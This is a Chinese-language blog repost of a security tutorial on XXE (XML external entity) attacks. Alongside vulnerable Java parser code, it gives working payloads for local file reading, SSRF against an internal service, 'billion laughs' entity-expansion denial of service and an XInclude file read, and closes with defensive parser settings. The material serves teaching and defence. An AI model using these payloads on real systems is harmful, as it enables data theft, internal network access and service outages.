个人中心
文章发布
退出
作者热门文章
- Java锁的逻辑(结合对象头和ObjectMonitor)
- 还在用饼状图?来瞧瞧这些炫酷的百分比可视化新图形(附代码实现)⛵
- 自动注册实体类到EntityFrameworkCore上下文,并适配ABP及ABPVNext
- 基于Sklearn机器学习代码实战
40
4
本文分享自华为云社区《 【安全攻防】深入浅出实战系列专题-XXE攻击 》,作者: MDKing.
XML基础:XML 指可扩展标记语言(Extensible Markup Language),是一种与HTML类似的纯文本的标记语言,设计宗旨是为了传输数据,而非显示数据。是W3C的推荐标准.
XML标签:XML被设计为具有自我描述性,XML标签是没有被预定义的,需要自行定义标签与文档结构。如下为包含了标题、发送者、接受者、内容等信息的xml文档.
DTD:指文档类型定义(Document Type Definition),通过定义根节点、元素(ELEMENT)、属性(ATTLIST)、实体(ENTITY)等约束了xml文档的内容按照指定的格式承载数据.
如下图,通过 <!DOCTYPE 根节点名称 [DTD内容]> 的规则指定了该xml文件合法的根节点元素为persons,它的子节点元素为person,以及person的子层元素以及属性.
。
。
实体:在DTD中通过 <!ENTITY 实体名称 "实体的值"> 等方式定义实体,相当于定义变量的作用,可在文档内容中通过 &实体名称; 的方式引用实体的值(变量的值).
实体类型:实体分为多种类型,从使用范围的维度,分为参数实体(只能在DTD中引用)与非参数实体(可以在DTD中、文档内容中引用)。区别如下:
| 样例 | 引用方式 | 使用范围与场景 | |
| 非参数实体 | <!ENTITY country "中国"> | &country; | 在DTD中、文档内容中均可引用,一般用来取代重复的字符串 |
| 参数实体 | <!ENTITY % countrydefine "xxx元素的DTD定义内容"> | %country; | 仅能在DTD定义中引用,一般用来保存某段重复的DTD定义 |
从值的来源维度,分为内部实体、外部实体。内部实体为文档内部直接定义值,外部实体为通过http、file等协议从文件外的某处获取内容作为实体的值。区别如下:
| 样例 | 特征与使用场景 | |
| 内部实体 | <!ENTITY country "中国"> | 值是明确的字符串常量等,可以直接定义在本文档中 |
| 外部实体 | <!ENTITY country SYSTEM "file:///D:/country.txt"> | 值来源于其它文件或者网络 |
XML外部实体注入:XML External Entity Injection即xml外部实体注入漏洞,简称XXE漏洞。当xml解析器支持对于外部实体的解析且待解析的xml文件可由外部控制时,就会发生此攻击。攻击者可以通过构造外部实体的内容为本地其它目录下的文件、访问内网/外网的制定url等方式实现自己的攻击目的,达到信息泄露、命令执行、拒绝服务、SSRF、内网端口扫描等攻击目的.
Xinclude:Xinclude用来导入外部xml文档,类似于php的include,将外部定义的dtd引入当前文件。该特性可以解决部分场景下引入外部实体具有的局限性,但并不是所有XML 解析器都支持 XInclude,W3C在XInclude Implementations Report中列出了支持的列表,结合XInclude特性也可以在部分场景下执行XXE攻击。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置 factory.setNamespaceAware(true);factory.setXIncludeAware(true); 如果不关闭Xinclude,仅禁用DTD解析也是存在安全风险的.
目的与场景:通过构造特定格式的xml文档,读取服务器上指定文件的内容,达到敏感信息获取的目的.
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY pw SYSTEM
"
file:///D:/securetest/xxe/passwd.txt
"
>]>
<root>&pw;</root>
服务器端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String xml
=
"
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
"
+
"
<!DOCTYPE root [ \n
"
+
"
\t<!ELEMENT root (#PCDATA)>\n
"
+
"
\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">]>\n
"
+
"
<root>&pw;</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setValidating(
true
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
}
执行结果:成功读取到了passwd.txt的内容。(服务端代码样例中打印在控制台上,对应实际系统中需要有将文档内容打印到界面上等处理。) 。
目的与场景:通过构造特定格式的xml文档,可以借助目标主机访问内网的其它主机开放的内部接口等服务.
内网其它服务器模拟准备:通过node staticServer.js命令启动服务器,监听3000端口 。
let express = require(
'
express
'
)
let app
=
express();
app.use(express.
static
(__dirname));
app.
get
(
'
/getInnerData
'
, function(req, res) {
console.log(req.headers)
res.end(
'
AK:abc;SK:ABDCEF
'
)
})
app.listen(
3000
)
经验证,http请求可成功返回 。
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY pw SYSTEM
"
http://127.0.0.1:3000/getInnerData
"
>]>
<root>&pw;</root>
服务器端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String xml
=
"
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
"
+
"
<!DOCTYPE root [ \n
"
+
"
\t<!ELEMENT root (#PCDATA)>\n
"
+
"
\t<!ENTITY pw SYSTEM \"http://127.0.0.1:3000/getInnerData\">]>\n
"
+
"
<root>&pw;</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setValidating(
true
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
}
执行结果:成功读取到内部接口getInnerData的内容.
目的与场景:通过构造特殊格式的xml文档,定义多层递归引用的实体(变量)让解析的内容以及时间以指数级增长,以实现DDos攻击的效果.
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY lol
"
lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n
"
>
<!ENTITY lol1
"
&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;
"
>
<!ENTITY lol2
"
&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;
"
>
<!ENTITY lol3
"
&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;
"
>
<!ENTITY lol4
"
&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;
"
>
<!ENTITY lol5
"
&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;
"
>
<!ENTITY lol6
"
&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;
"
>]>
<root>&lol6;</root>
服务器端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
//
获取当前时间
LocalDateTime startTime =
LocalDateTime.now();
String xml
=
"
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
"
+
"
<!DOCTYPE root [ \n
"
+
"
\t<!ELEMENT root (#PCDATA)>\n
"
+
"
\t<!ENTITY lol \"lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n\">\n
"
+
"
\t<!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n
"
+
"
\t<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n
"
+
"
\t<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n
"
+
"
\t<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n
"
+
"
\t<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n
"
+
"
\t<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;\">]>\n
"
+
"
<root>&lol6;</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setValidating(
true
);
factory.setExpandEntityReferences(
false
);
System.setProperty(
"
entityExpansionLimit
"
,
"
50000000
"
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
System.
out
.println(
"
根节点内容长度:
"
+
rootElement.getTextContent().length());
System.
out
.println(
"
根节点内容大小:
"
+ rootElement.getTextContent().getBytes().length / (
1024
*
1024
) +
"
MB
"
);
//
获取当前时间并计算时间差
LocalDateTime endTime =
LocalDateTime.now();
Duration duration
=
Duration.between(startTime, endTime);
System.
out
.println(
"
解析执行时间为:
"
+ duration.toMillis() +
"
豪秒
"
);
}
执行结果:如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储.
目的与场景:该样例演示了如果打开了Xinclude开关的危险性,即使做了DTD的安全禁用,还是依然可以进行XXE攻击.
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY lol
"
lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n
"
>
<!ENTITY lol1
"
&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;
"
>
<!ENTITY lol2
"
&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;
"
>
<!ENTITY lol3
"
&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;
"
>
<!ENTITY lol4
"
&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;
"
>
<!ENTITY lol5
"
&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;
"
>
<!ENTITY lol6
"
&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;
"
>]>
<root>&lol6;</root>
服务端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String xml
=
"
<?xml version=\"1.0\" ?>\n
"
+
"
<root xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n
"
+
"
<xi:include href=\"file:///D:/securetest/xxe/passwd.txt\" parse=\"text\"/>\n
"
+
"
</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setFeature(
"
http://apache.org/xml/features/disallow-doctype-decl
"
,
true
);
factory.setNamespaceAware(
true
);
factory.setXIncludeAware(
true
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
}
执行结果:
常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置 factory.setNamespaceAware(true);factory.setXIncludeAware(true); 如果不关闭Xinclude,仅禁用DTD解析也是存在安全风险的。2.4中演示了即使禁用了DTD解析,打开Xinclude功能开关后存在的安全问题。所以从安全角度考虑,首先禁止打开Xinclude开关.
如果业务中不需要进行DTD定义以及解析,最好的方式就是完全禁用DTD解析。例如Dom类型的解析器中通过 factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 来禁用。效果如下:
方式一:如果业务中确实需要DTD定义以及解析,可以通过仅禁用外部实体解析的方式进行安全防护。例如Dom类型的解析器中通过如下方式设置禁用外部实体解析:
factory.setFeature(
"
http://xml.org/sax/features/external-general-entities
"
,
false
);
factory.setFeature(
"
http://xml.org/sax/features/external-parameter-entities
"
,
false
);
factory.setFeature(
"
http://apache.org/xml/features/nonvalidating/load-external-dtd
"
,
false
);
效果如下:
方式二:禁用外部实体解析还有另外一种方式,重写实体解析函数,核心代码:
builder.setEntityResolver(
new
EntityResolver() {
@Override
public
InputSource resolveEntity(String publicId, String systemId) throws SAXException,IOException {
return
new
InputSource(
new
StringReader(
""
));
}
});
效果如下:
IoT已将包括上述安全编码逻辑在内的常用XML解析器的安全编码规范提取到IoT自定义安全规则集,上线到所有IoT服务的生产发布流水线中,自动化的保障各服务的现网代码安全。如:
点击关注,第一时间了解华为云新鲜技术~ 。
。
最后此篇关于从原理到实战,详解XXE攻击的文章就讲到这里了,如果你想了解更多关于从原理到实战,详解XXE攻击的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
40
4
0
本文全面深入地探讨了Docker容器通信技术,从基础概念、网络模型、核心组件到实战应用。详细介绍了不同网络模式及其实现,提供了容器通信的技术细节和实用案例,旨在为专业从业者提供深入的技术洞见和实
📒博客首页:崇尚学技术的科班人 🍣今天给大家带来的文章是《Dubbo快速上手 -- 带你了解Dubbo使用、原理》🍣 🍣希望各位小伙伴们能够耐心的读完这篇文章🍣 🙏博主也在学习阶段,如若发
一、写在前面 我们经常使用npm install ,但是你是否思考过它内部的原理是什么? 1、执行npm install 它背后帮助我们完成了什么操作? 2、我们会发现还有一个成为package-lo
Base64 Base64 是什么?是将字节流转换成可打印字符、将可打印字符转换为字节流的一种算法。Base64 使用 64 个可打印字符来表示转换后的数据。 准确的来说,Base64 不算
目录 协程定义 生成器和yield语义 Future类 IOLoop类 coroutine函数装饰器 总结 tornado中的
切片,这是一个在go语言中引入的新的理念。它有一些特征如下: 对数组抽象 数组长度不固定 可追加元素 切片容量可增大 容量大小成片增加 我们先把上面的理念整理在这
文章来源:https://sourl.cn/HpZHvy 引 言 本文主要论述的是“RPC 实现原理”,那么首先明确一个问题什么是 RPC 呢?RPC 是 Remote Procedure Call
源码地址(包含所有与springmvc相关的,静态文件路径设置,request请求入参接受,返回值处理converter设置等等): spring-framework/WebMvcConfigurat
请通过简单的java类向我展示一个依赖注入(inject)原理的小例子虽然我已经了解了spring,但是如果我需要用简单的java类术语来解释它,那么你能通过一个简单的例子向我展示一下吗?提前致谢。
1、背景 我们平常使用手机和电脑上网,需要访问公网上的网络资源,如逛淘宝和刷视频,那么手机和电脑是怎么知道去哪里去拿到这个网络资源来下载到本地的呢? 就比如我去食堂拿吃的,我需要
大家好,我是飞哥! 现在 iptables 这个工具的应用似乎是越来越广了。不仅仅是在传统的防火墙、NAT 等功能出现,在今天流行的的 Docker、Kubernets、Istio 项目中也经
本篇涉及到的所有接口在公开文档中均无,需要下载 GitHub 上的源码,自己创建私有类的文档。 npm run generateDocumentation -- --private yarn gene
我最近在很多代码中注意到人们将硬编码的配置(如端口号等)值放在类/方法的深处,使其难以找到,也无法配置。 这是否违反了 SOLID 原则?如果不是,我是否可以向我的团队成员引用另一个“原则”来说明为什
我是 C#、WPF 和 MVVM 模式的新手。很抱歉这篇很长的帖子,我试图设定我所有的理解点(或不理解点)。 在研究了很多关于 WPF 提供的命令机制和 MVVM 模式的文本之后,我在弄清楚如何使用这
可比较的 jQuery 函数 $.post("/example/handler", {foo: 1, bar: 2}); 将创建一个带有 post 参数 foo=1&bar=2 的请求。鉴于 $htt
如果Django不使用“延迟查询执行”原则,主要问题是什么? q = Entry.objects.filter(headline__startswith="What") q = q.filter(
我今天发现.NET框架在做计算时遵循BODMAS操作顺序。即计算按以下顺序进行: 括号 订单 部门 乘法 添加 减法 但是我四处搜索并找不到任何文档确认 .NET 绝对 遵循此原则,是否有此类文档?如
已结束。此问题不符合 Stack Overflow guidelines .它目前不接受答案。 我们不允许提出有关书籍、工具、软件库等方面的建议的问题。您可以编辑问题,以便用事实和引用来回答它。 关闭
API 回顾 在创建 Viewer 时可以直接指定 影像供给器(ImageryProvider),官方提供了一个非常简单的例子,即离屏例子(搜 offline): new Cesium.Viewer(
As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be
我是一名优秀的程序员,十分优秀!